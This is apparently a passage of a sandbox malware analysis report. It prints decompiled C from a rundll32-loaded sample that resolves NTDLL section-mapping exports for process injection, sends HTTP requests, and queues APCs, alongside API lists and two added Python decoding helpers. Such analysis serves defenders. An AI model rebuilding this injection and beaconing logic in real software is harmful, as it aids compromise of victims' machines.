                                                          • Instruction Fuzzy Hash: 24213975D00209FFEB10EF94DD84EEEBBB9EB49304F0400A9E910A6265D7719A54DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
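E036D6C41 above decides whether the sample runs elevated and which integrity level it has by reading the last sub-authority of the TokenIntegrityLevel SID, falling back to 0x2000 (medium) on systems older than Vista. The Python below is an added example, not code from this report or from the sample: it re-implements that RID extraction on a constructed SID blob so the on-disk SID layout, the count-1 indexing and the RID-to-label mapping can be checked offline. SID layout and the mandatory-label RIDs are from winnt.h; that the global at 0x36da2fc holds the OS major version is an inference from the "> 5" comparison and is labelled as such in the code.

```python
"""Added example: re-implements the integrity-level extraction of E036D6C41
on constructed SID blobs. Not part of the Joe Sandbox report or the sample."""
import struct

# TOKEN_INFORMATION_CLASS values and access mask used by the sample (winnt.h)
TOKEN_ELEVATION = 0x14        # 20
TOKEN_INTEGRITY_LEVEL = 0x19  # 25
TOKEN_QUERY_ACCESS = 0x20008  # STANDARD_RIGHTS_READ | TOKEN_QUERY

SECURITY_MANDATORY_LABEL_AUTHORITY = 16   # S-1-16-...
SECURITY_MANDATORY_MEDIUM_RID = 0x2000    # the sample's default

# Mandatory-label RID floors, highest first; Windows classifies by range,
# so 0x3100 is still "High".
MANDATORY_RIDS = [
    (0x5000, "ProtectedProcess"),
    (0x4000, "System"),
    (0x3000, "High"),
    (0x2100, "MediumPlus"),
    (0x2000, "Medium"),
    (0x1000, "Low"),
    (0x0000, "Untrusted"),
]


def build_sid(identifier_authority, sub_authorities):
    """Serialise a SID in its in-memory layout:
    Revision(1) | SubAuthorityCount(1) | IdentifierAuthority(6, big-endian)
    | SubAuthority[n] (little-endian DWORDs)."""
    if not 0 < len(sub_authorities) <= 15:
        raise ValueError("a SID carries 1..15 sub-authorities")
    blob = bytes([1, len(sub_authorities)])
    blob += identifier_authority.to_bytes(6, "big")
    for sa in sub_authorities:
        blob += struct.pack("<I", sa)
    return blob


def sid_sub_authority_count(sid):
    """Equivalent of GetSidSubAuthorityCount: the byte at offset 1."""
    return sid[1]


def sid_sub_authority(sid, index):
    """Equivalent of GetSidSubAuthority: DWORD at offset 8 + 4*index."""
    if index >= sid_sub_authority_count(sid):
        raise IndexError("sub-authority index out of range")
    return struct.unpack_from("<I", sid, 8 + 4 * index)[0]


def sid_to_string(sid):
    """Render the SID in the familiar S-R-A-S... form."""
    auth = int.from_bytes(sid[2:8], "big")
    subs = [sid_sub_authority(sid, i) for i in range(sid_sub_authority_count(sid))]
    return "S-%d-%d-%s" % (sid[0], auth, "-".join(str(s) for s in subs))


def integrity_rid(label_sid, os_major):
    """Mirror E036D6C41's RID logic.
    os_major stands in for the global at 0x36da2fc (assumed to be the OS
    major version). On major <= 5 there are no integrity levels, so the
    default medium RID is kept; otherwise the last sub-authority of the
    TokenIntegrityLevel SID is read, with the index truncated to a byte
    exactly as the decompiled code does."""
    if os_major <= 5:
        return SECURITY_MANDATORY_MEDIUM_RID
    last = (sid_sub_authority_count(label_sid) - 1) & 0xFF
    return sid_sub_authority(label_sid, last)


def integrity_label(rid):
    """Map a mandatory-label RID to its level name by range."""
    for floor, name in MANDATORY_RIDS:
        if rid >= floor:
            return name
    return "Untrusted"


if __name__ == "__main__":
    # Constructed inputs: the medium and high mandatory-label SIDs.
    for rid in (0x2000, 0x3000):
        sid = build_sid(SECURITY_MANDATORY_LABEL_AUTHORITY, [rid])
        got = integrity_rid(sid, os_major=10)
        print(sid_to_string(sid), hex(got), integrity_label(got))
```

On a pre-Vista host the sample never opens the token at all and reports itself as elevated with a medium label, which is why the default values are set before the version check.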

C-Code - Quality: 64%
			E036D1D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {   // builds "<prefix>=<a4>"-style text, passes it through E036D24B3 and post-processes the result; returns a heap string or 0
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x36da348; // 0x228d5a8, base of the sample's string table
				_t1 = _t9 + 0x36db624; // 0x253d7325 = "%s=%" read as little-endian ASCII: the start of a format string
				_t36 = 0;
				_t28 = E036D624E(__ecx, _t1);   // lstrlen + sprintf wrapper (see APIs below): expands the format string
				if(_t28 != 0) {
					_t39 = __imp__;   // import resolved at runtime; the API list below identifies it as lstrlen
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x59695b1
					_t40 = E036D6D63(_v8 + _t6);   // RtlAllocateHeap wrapper: room for both strings plus the terminator
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);   // lstrcat: append _a4 to the formatted prefix
						_t19 = E036D24B3(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E036D6C2C(_t40);   // RtlFreeHeap wrapper
						_t42 = E036D5A07(StrTrimA(_t36, "="), _t36);   // strip leading/trailing '=' characters, then reformat via _snprintf
						if(_t42 != 0) {
							E036D6C2C(_t36);
							_t36 = _t42;
						}
						_t43 = E036D4162(_t36, _t33);
						if(_t43 != 0) {
							E036D6C2C(_t36);
							_t36 = _t43;
						}
					}
					E036D6C2C(_t28);
				}
				return _t36;
			}

Instruction addresses (one per statement, in order): 0x036d1d33 0x036d1d36 0x036d1d37 0x036d1d3e 0x036d1d45 0x036d1d4c 0x036d1d50 0x036d1d57 0x036d1d5e 0x036d1d63 0x036d1d6b 0x036d1d75 0x036d1d79 0x036d1d7d 0x036d1d83 0x036d1d88 0x036d1d92 0x036d1d98 0x036d1d9a 0x036d1db1 0x036d1db5 0x036d1db8 0x036d1dbd 0x036d1dbd 0x036d1dc6 0x036d1dca 0x036d1dcd 0x036d1dd2 0x036d1dd2 0x036d1dca 0x036d1dd5 0x036d1dda 0x036d1de0

                                                          APIs
                                                            • Part of subcall function 036D624E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,036D1D4C,253D7325,00000000,00000000,?,75BCC740,036D58D7), ref: 036D62B5
                                                            • Part of subcall function 036D624E: sprintf.NTDLL ref: 036D62D6
                                                          • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D1D5E
                                                          • lstrlen.KERNEL32(00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D1D66
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • strcpy.NTDLL ref: 036D1D7D
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 036D1D88
                                                            • Part of subcall function 036D24B3: lstrlen.KERNEL32(00000000,00000000,036D58D7,00000000,?,036D1D97,00000000,036D58D7,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D24C4
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,036D58D7,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D1DA5
                                                            • Part of subcall function 036D5A07: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,036D1DB1,00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D5A11
                                                            • Part of subcall function 036D5A07: _snprintf.NTDLL ref: 036D5A6F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
• Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 7bc1dec81c79a209aebb206534dbfe39cc39ab27e0aa0f1bfef829573337c169
                                                          • Instruction ID: e2c9c52a42616d1a45cd2f1a52a9d4922bf6a1714aa69f298f2616a4c7e9aafa
                                                          • Opcode Fuzzy Hash: 7bc1dec81c79a209aebb206534dbfe39cc39ab27e0aa0f1bfef829573337c169
                                                          • Instruction Fuzzy Hash: 9411C637D01324674762F7B5EC84CAF7AAD9E8A5543091019F900DB208CFB5DD0287A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
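Throughout the decompiled code in this report the Joe Sandbox IDA plugin prints the first four bytes of a pointed-to string as a hex DWORD comment (0x253d7325 in E036D1D33, 0x4c44544e and the 0x..775a constants in E036D44DE, 0070006F in the SysAllocString call), which is how the string-table offsets can be read without the dump. The Python below is an added helper for decoding those comments; it is not part of the report or the sample. It assumes the comments are little-endian DWORDs and tries an ANSI and a UTF-16LE reading; the hint table it ships with is copied from the comments visible on this page.

```python
"""Added example: decode the hex DWORD comments the decompiler prints next to
string pointers. Not part of the Joe Sandbox report or the sample."""
import struct


def dword_bytes(value):
    """Byte order of a 32-bit constant as it sits in memory (little-endian)."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def decode_string_hint(value):
    """Return (text, encoding) for a DWORD comment, or (None, None).
    If bytes 1 and 3 are NUL and bytes 0 and 2 are not, the constant is the
    start of a UTF-16LE string (e.g. SysAllocString(0070006F) above);
    otherwise four printable ASCII bytes are reported as an ANSI prefix."""
    raw = dword_bytes(value)
    if raw[1] == 0 and raw[3] == 0 and raw[0] and raw[2]:
        return raw.decode("utf-16-le"), "utf-16-le"
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii"), "ansi"
    return None, None


def annotate(hints):
    """Map {label: dword} to {label: decoded four-character prefix or None}."""
    return {label: decode_string_hint(v)[0] for label, v in hints.items()}


# Constants copied from the decompiler comments on this page.
SAMPLE_HINTS = {
    "E036D1D33 format string": 0x253D7325,
    "E036D44DE module name": 0x4C44544E,
    "E036D44DE export at +0x0c": 0x7243775A,
    "E036D44DE export at +0x10": 0x614D775A,
    "E036D44DE export at +0x14": 0x6E55775A,
    "E036D44DE export at +0x18": 0x4E6C7452,
    "E036D44DE export at +0x1c": 0x6C43775A,
    "SysAllocString argument": 0x0070006F,
    "string-table base (not a string)": 0x0228D5A8,
}


if __name__ == "__main__":
    for label, prefix in annotate(SAMPLE_HINTS).items():
        print("%-36s %s" % (label, prefix))
```

Only four characters survive in each comment, so the decoded values are prefixes ("NTDL", "ZwCr", "ZwMa") rather than full names; identifying the export behind a prefix needs the string table from the dump.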

                                                          APIs
                                                            • Part of subcall function 036D1F7A: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,059689D0,036D3F35,?,?,?,?,?,?,?,?,?,?,?,036D3F35), ref: 036D2047
                                                            • Part of subcall function 036D5634: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 036D5671
                                                            • Part of subcall function 036D5634: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 036D56A2
                                                          • SysAllocString.OLEAUT32(00000000), ref: 036D3F61
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 036D3F75
                                                          • SysAllocString.OLEAUT32(00000000), ref: 036D3F87
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D3FEF
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D3FFE
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D4009
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
• Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                                          • String ID:
                                                          • API String ID: 2831207796-0
                                                          • Opcode ID: e9ada136c865149cbed007e41851e3d297daed36b5ce5d4d763d9c635d092874
                                                          • Instruction ID: 4431c9c158142f8b20a28f9d241367da65ecdf1884be5fd13d85b1bf9904cbfa
                                                          • Opcode Fuzzy Hash: e9ada136c865149cbed007e41851e3d297daed36b5ce5d4d763d9c635d092874
                                                          • Instruction Fuzzy Hash: FF416F36D00609AFDB01EFB9D844AAEB7B9EF89311F14442AED14EB260DB719D05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,80000000,00000001,?,062960C0,00000018,06274B2B,?,00000201,06299A24,062999DC,-0000000C,?), ref: 06285843
                                                          • VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,?,?,?,80000000,00000001,?,062960C0,00000018,06274B2B), ref: 062858CE
                                                          • RtlEnterCriticalSection.NTDLL(0629A400), ref: 062858F7
                                                          • RtlLeaveCriticalSection.NTDLL(0629A400), ref: 06285915
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                          • String ID:
                                                          • API String ID: 3666628472-0
                                                          • Opcode ID: 1c9d75ce35b991d8b726e546528f04e9f4134d6eb13d914d766492b0d4b8f815
                                                          • Instruction ID: df51ce80a795758f21bafd4cdd88d86545be129597fd88e643fcd43af8f96a3d
                                                          • Opcode Fuzzy Hash: 1c9d75ce35b991d8b726e546528f04e9f4134d6eb13d914d766492b0d4b8f815
                                                          • Instruction Fuzzy Hash: 0D415CB0A21706EFDB91EF65CC84A9DBBF9FF48310B10811AE925E7250D7749A51CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E036D44DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {   // allocates a 0x20-byte context, fills it with five NTDLL export addresses and hands it to E036D190C; returns a Win32 error code (0 on success), *_a12 receives the context
				intOrPtr _v8;   // result / error code
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;   // ntdll.dll module handle
				intOrPtr _t54;              // the context block

				_t54 = E036D6D63(0x20);   // RtlAllocateHeap wrapper
				if(_t54 == 0) {
					_v8 = 8;   // ERROR_NOT_ENOUGH_MEMORY
				} else {
					_t23 =  *0x36da348; // 0x228d5a8, base of the sample's string table
					_t1 = _t23 + 0x36db11a; // 0x4c44544e = "NTDL" read as little-endian ASCII, i.e. the "NTDLL" module name
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x36da348; // 0x228d5a8
					_t2 = _t26 + 0x36db761; // 0x7243775a = "ZwCr..." (only the first four characters are visible in this comment)
					_v8 = 0x7f;   // ERROR_PROC_NOT_FOUND: returned if any of the exports below is missing
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E036D6C2C(_t54);   // RtlFreeHeap wrapper: release the context on any failure
					} else {
						_t30 =  *0x36da348; // 0x228d5a8
						_t5 = _t30 + 0x36db74e; // 0x614d775a = "ZwMa..."
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x36da348; // 0x228d5a8
							_t7 = _t33 + 0x36db771; // 0x6e55775a = "ZwUn..."
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x36da348; // 0x228d5a8
								_t9 = _t36 + 0x36db4ca; // 0x4e6c7452 = "RtlN..."
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x36da348; // 0x228d5a8
									_t11 = _t39 + 0x36db786; // 0x6c43775a = "ZwCl..."
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;   // 0x40: likely PAGE_EXECUTE_READWRITE (inference from the ZwCr.../ZwMa.../ZwUn... prefixes, which are consistent with the section-mapping injection flagged in the report's signatures; the full export names are not visible here)
										_t44 = E036D190C(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v8;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,036D4046,?,?,?,?,00000000,00000000), ref: 036D4503
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 036D4525
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 036D453B
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 036D4551
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 036D4567
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 036D457D
                                                            • Part of subcall function 036D190C: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,036D459D), ref: 036D1969
                                                            • Part of subcall function 036D190C: memset.NTDLL ref: 036D198B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                          • String ID:
                                                          • API String ID: 3012371009-0
                                                          • Opcode ID: 481bb4f6bafac1419a66009bc5594e7b8a10d2918cf61b517af7df1ce13b9ae7
                                                          • Instruction ID: 64df30c3262ef8ac12426012bdd7b6eabafb1d533d35f9cd1e27079941064f51
                                                          • Opcode Fuzzy Hash: 481bb4f6bafac1419a66009bc5594e7b8a10d2918cf61b517af7df1ce13b9ae7
                                                          • Instruction Fuzzy Hash: F5215371D1170A9FDB51DF6AD984E5ABBFCEF44600B064415E905C7354DF70ED058BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,0627C71A,0627C71A,?,06286EFA,?,0627C71A,?,?,00000000), ref: 06288F87
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06288FA9
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06288FBF
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06288FD5
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06288FEB
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06289001
                                                            • Part of subcall function 0627710A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 06277167
                                                            • Part of subcall function 0627710A: memset.NTDLL ref: 0627718B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                          • String ID:
                                                          • API String ID: 3012371009-0
                                                          • Opcode ID: 023725328bae66ad68ac70fd06578c9565db9d94b1ec32861d98120dcec5118e
                                                          • Instruction ID: 214ce995dcc693ff14f15afcdeab48da792881e198fa3d4e310eb7c1770bccb7
                                                          • Opcode Fuzzy Hash: 023725328bae66ad68ac70fd06578c9565db9d94b1ec32861d98120dcec5118e
                                                          • Instruction Fuzzy Hash: 2E2168B0A1170AAFD751EFADEC48D6AB7ECEF45244B044426EA04CB241E774E940CF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D6954(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                          				void* __esi;
                                                          				long _t10;
                                                          				void* _t18;
                                                          				void* _t22;
                                                          
                                                          				_t9 = __eax;
                                                          				_t22 = __eax;
                                                          				if(_a4 != 0) {
                                                          					_t9 = E036D45C4(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
                                                          					if(_t9 == 0) {
                                                          						L9:
                                                          						return GetLastError();
                                                          					}
                                                          				}
                                                          				_t10 = E036D7AF1(_t9, _t18, _t22, _a8); // executed
                                                          				if(_t10 == 0) {
                                                          					ResetEvent( *(_t22 + 0x1c));
                                                          					ResetEvent( *(_t22 + 0x20));
                                                          					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                                                          						SetEvent( *(_t22 + 0x1c));
                                                          						goto L7;
                                                          					} else {
                                                          						_t10 = GetLastError();
                                                          						if(_t10 == 0x3e5) {
                                                          							L7:
                                                          							_t10 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				if(_t10 == 0xffffffff) {
                                                          					goto L9;
                                                          				}
                                                          				return _t10;
                                                          			}

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,036D37A0,?,?,76CC81D0,00000000), ref: 036D698E
                                                          • ResetEvent.KERNEL32(?), ref: 036D6993
                                                          • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 036D69A0
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?,?), ref: 036D69AB
                                                          • GetLastError.KERNEL32(?,?,00000102,036D37A0,?,?,76CC81D0,00000000), ref: 036D69C6
                                                            • Part of subcall function 036D45C4: lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,036D6973,?,?,?,?,00000102,036D37A0,?,?,76CC81D0), ref: 036D45D0
                                                            • Part of subcall function 036D45C4: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,036D6973,?,?,?,?,00000102,036D37A0,?), ref: 036D462E
                                                            • Part of subcall function 036D45C4: lstrcpy.KERNEL32(00000000,00000000), ref: 036D463E
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?), ref: 036D69B9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3739416942-0
                                                          • Opcode ID: 73b994bf7102fd2c8bf7845fd0c7c44a9071d47c20d7d5f701043319074cb9ac
                                                          • Instruction ID: e37601ccc7d39a9a49207d289533e470693e78722239533179e4fe3d2006eca8
                                                          • Opcode Fuzzy Hash: 73b994bf7102fd2c8bf7845fd0c7c44a9071d47c20d7d5f701043319074cb9ac
                                                          • Instruction Fuzzy Hash: C901A231904202AADB30AB75EE44F1BFBA8AF44364F550628F553D51E8CB20D414D614
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,00000000,0628893A,0629A174,06290998), ref: 062873C1
                                                          • QueueUserAPC.KERNEL32(0628893A,00000000,?,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873D6
                                                          • GetLastError.KERNEL32(00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873E1
                                                          • TerminateThread.KERNEL32(00000000,00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873EB
                                                          • CloseHandle.KERNEL32(00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873F2
                                                          • SetLastError.KERNEL32(00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873FB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                          • String ID:
                                                          • API String ID: 3832013932-0
                                                          • Opcode ID: b2d1d6079016bb8b044a3c5268bc91b1c91cf2abebc5de807e8e26128245be02
                                                          • Instruction ID: aabe3040f64a77384013ec97ca7ce3785de7c4c3b0a9728cfdd1efef68b009ca
                                                          • Opcode Fuzzy Hash: b2d1d6079016bb8b044a3c5268bc91b1c91cf2abebc5de807e8e26128245be02
                                                          • Instruction Fuzzy Hash: F8F0D432606321ABD7631FA1BC0DF5EBA6ABB8A755F548404FB05A1190C72188118FB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E036D3472(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                          				signed int _v8;
                                                          				char _v12;
                                                          				signed int* _v16;
                                                          				char _v284;
                                                          				void* __esi;
                                                          				char* _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t62;
                                                          				intOrPtr _t64;
                                                          				char _t65;
                                                          				void* _t67;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t69;
                                                          				void* _t70;
                                                          				intOrPtr _t71;
                                                          				void* _t73;
                                                          				signed int _t81;
                                                          				void* _t91;
                                                          				void* _t92;
                                                          				char _t98;
                                                          				signed int* _t100;
                                                          				intOrPtr* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t92 = __ecx;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t98 = _a16;
                                                          				if(_t98 == 0) {
                                                          					__imp__( &_v284,  *0x36da3dc);
                                                          					_t91 = 0x80000002;
                                                          					L6:
                                                          					_t59 = E036D61FC( &_v284,  &_v284);
                                                          					_a8 = _t59;
                                                          					if(_t59 == 0) {
                                                          						_v8 = 8;
                                                          						L29:
                                                          						_t60 = _a20;
                                                          						if(_t60 != 0) {
                                                          							 *_t60 =  *_t60 + 1;
                                                          						}
                                                          						return _v8;
                                                          					}
                                                          					_t101 = _a24;
                                                          					_t62 = E036D6F28(_t92, _t97, _t101, _t91, _t59); // executed
                                                          					if(_t62 != 0) {
                                                          						L27:
                                                          						E036D6C2C(_a8);
                                                          						goto L29;
                                                          					}
                                                          					_t64 =  *0x36da318; // 0x5969d70
                                                          					_t16 = _t64 + 0xc; // 0x5969e92
                                                          					_t65 = E036D61FC(_t64,  *_t16);
                                                          					_a24 = _t65;
                                                          					if(_t65 == 0) {
                                                          						L14:
                                                          						_t29 = _t101 + 0x14; // 0x102
                                                          						_t33 = _t101 + 0x10; // 0x3d036d90, executed
                                                          						_t67 = E036D4822(_t97,  *_t33, _t91, _a8,  *0x36da3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                                                          						if(_t67 == 0) {
                                                          							_t68 =  *0x36da348; // 0x228d5a8
                                                          							if(_t98 == 0) {
                                                          								_t35 = _t68 + 0x36dba4c; // 0x4d4c4b48
                                                          								_t69 = _t35;
                                                          							} else {
